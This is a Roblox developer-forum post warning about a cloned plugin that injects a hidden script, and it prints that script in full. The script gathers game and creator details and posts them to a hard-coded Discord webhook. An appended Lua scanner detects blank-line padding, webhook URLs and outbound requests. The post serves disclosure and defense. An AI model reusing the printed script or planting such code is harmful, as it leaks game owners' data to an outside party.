Hello! I apologize if this is the wrong place to be posting this, but I don’t really know where else to put this. I can’t post in Bug Reports, which was where I thought of posting this, so that’s why I’m here.
I am currently working on the building phase of a project and I wanted to add some more detail, so I installed this plugin:
It appears very high on the “Relevance” sort, which is kind of concerning because of what it does.
As I was searching through for other plugins I noticed that there were many plugins all over the place going by the same name, created by different people.
Once I had the plugin installed, I realized that it was a copy of someone else’s plugin (which there are also many many clones of). The plugin immediately requested access for script injection, which I denied. I then messed around with it and it was pretty normal. As an experiment I allowed script injection to see what it would do.
When I launched the game, my output started throwing errors:
As you can see, something was trying to call `require()` from the client and use the HTTPService. Completely by luck, I had HTTPService off.
The malicious script that was trying to `require()` something disappeared immediately, but the script trying to use HTTPService stuck around. I clicked the error to see what it was doing. The script was called `Script`, and it had hundreds of thousands of blank lines, presumably to hide the malicious code. The second error took me right to the bad part.
The script seems to have been gathering what data it could about the game, and then packing it into a JSON and sending it to a Discord server or bot via the HTTPService. This is the code:
```lua
function owner()
    if game.CreatorType == Enum.CreatorType.User then
        return "User"
    elseif game.CreatorType == Enum.CreatorType.Group then
        return "Group"
    end
end
function name()
    if owner() == "User" then
        local lol = game.Players:GetNameFromUserIdAsync(game.CreatorId)
        return lol
    elseif owner() == "Group" then
        local hehe = game.GroupService:GetGroupInfoAsync(game.CreatorId).Owner
        return hehe
    end
end
function filtering()
    if game.Workspace.FilteringEnabled == true then
        return "ENABBLED"
    else
        if game.Workspace.FilteringEnabled == false then
            return "DISABLED"
        end
    end
end
local placeId = game.PlaceId
local p = game.Players:GetChildren()
local l1 = "https://discord.com/api/webhooks/796814416443080734/LUsF2UA2gAbOj9vhhMtust2yV6jQOwZbEFFHxuIV8KUjL4dzhhQyxDWm5tDQ_cBjrqdT"
local PlaceId = game.PlaceId
local plrs = game.Players
local maxplayers = plrs.MaxPlayers
local GetName = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId)
local plr = game:GetService("Players")
local HTTP = game:GetService("HttpService")
local Data =
{
    ["content"] = "",
    ["embeds"] = {{
        ["title"] = "New Game Logged",
        ["description"] = "Game Logged: " .. "**"..GetName.Name.."**",
        ["type"] = "rich",
        ["color"]= tonumber(0xff9429),
        ["footer"] = {
            ["icon_url"] = '',
            ["text"] = "NovaSS | 2021."
        },
        ["thumbnail"] = {
            ["url"] = "https://www.roblox.com/asset-thumbnail/image?assetId="..game.PlaceId.."&width=768&height=432&format=png",
        },
        ["author"] = {
            ["name"] = "NovaSS",
            ["icon_url"] = ""
        },
        ["fields"] = {
            {
                ["name"] = "Link:",
                ["value"] = "https://www.roblox.com/games/"..game.PlaceId.."",
                ["inline"] = false
            },
            {
                ["name"] = "Creator:",
                ["value"] = name(),
                ["inline"] = false
            },
            {
                ["name"] = "**__Creator Type:__**",
                ["value"] = owner(),
                ["inline"] = false
            },
            {
                ["name"] = "**__FilteringEnabled:__**",
                ["value"] = filtering(),
                ["inline"] = false
            },
            {
                ["name"] = "**__Server Players:__**",
                ["value"] = #plrs:GetPlayers().."/"..game.Players.MaxPlayers,
                ["inline"] = false
            },
            {
                ["name"] = '**__Server Code:__**',
                ["value"] = "```lua\nRoblox.GameLauncher.JoinGameInstance("..game.PlaceId..","..'"'..game.JobId..'"'..")```",
                ["inline"] = false
            }
        }
    }
    }
}
Data = HTTP:JSONEncode(Data)
HTTP:PostAsync(l1, Data)
```
Again, I apologize if this is the wrong place to put this post. This is definitely dangerous though, and it’s very problematic that whoever is doing this could get their plugin to the front page of plugins.
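
A defensive check for the traits described in this post, as an added example that is not part of the original post: it flags scripts with long runs of blank-line padding, a hard-coded webhook URL, outbound HttpService calls, or `require()` with a numeric asset id. The function names, the padding threshold and the guess that the hidden `require()` took an asset id are assumptions; it runs from the Studio command bar against the open place, or in plain Lua against a constructed sample.

```lua
-- Added example: heuristic scan of script sources for the traits described in the post.
local BLANK_RUN_LIMIT = 200 -- assumed threshold; legitimate scripts rarely pad this much

-- Longest run of consecutive whitespace-only lines in a source string.
local function longestBlankRun(src)
    local longest, run = 0, 0
    for line in (src .. "\n"):gmatch("([^\n]*)\n") do
        if line:match("^%s*$") then
            run = run + 1
            if run > longest then longest = run end
        else
            run = 0
        end
    end
    return longest
end

-- Returns a list of human-readable findings for one script's source.
local function inspect(src)
    local findings = {}
    local blanks = longestBlankRun(src)
    if blanks >= BLANK_RUN_LIMIT then
        table.insert(findings, ("%d consecutive blank lines (padding)"):format(blanks))
    end
    if src:find("/api/webhooks/", 1, true) then
        table.insert(findings, "hard-coded webhook URL")
    end
    if src:find("PostAsync", 1, true) or src:find("RequestAsync", 1, true) then
        table.insert(findings, "outbound HttpService request")
    end
    if src:find("require%s*%(%s*%d+") then -- assumption: the loader used a numeric asset id
        table.insert(findings, "require() of a numeric asset id")
    end
    return findings
end

local function report(label, src)
    local findings = inspect(src)
    if #findings > 0 then print(label .. ": " .. table.concat(findings, "; ")) end
end

if game then -- inside Studio: scan every script in the open place
    for _, inst in ipairs(game:GetDescendants()) do
        local ok, src = pcall(function() return inst:IsA("LuaSourceContainer") and inst.Source end)
        if ok and src then report(inst:GetFullName(), src) end
    end
else -- plain Lua: constructed sample, not the script from the post
    report("sample", "print('hi')" .. ("\n"):rep(500) .. "HTTP:PostAsync('https://example.invalid/api/webhooks/0/x', d)")
end
```

These are string heuristics, so an obfuscated script can evade them; a hit is a reason to open the script and read it, and to keep HttpService disabled until the plugin that inserted it is removed.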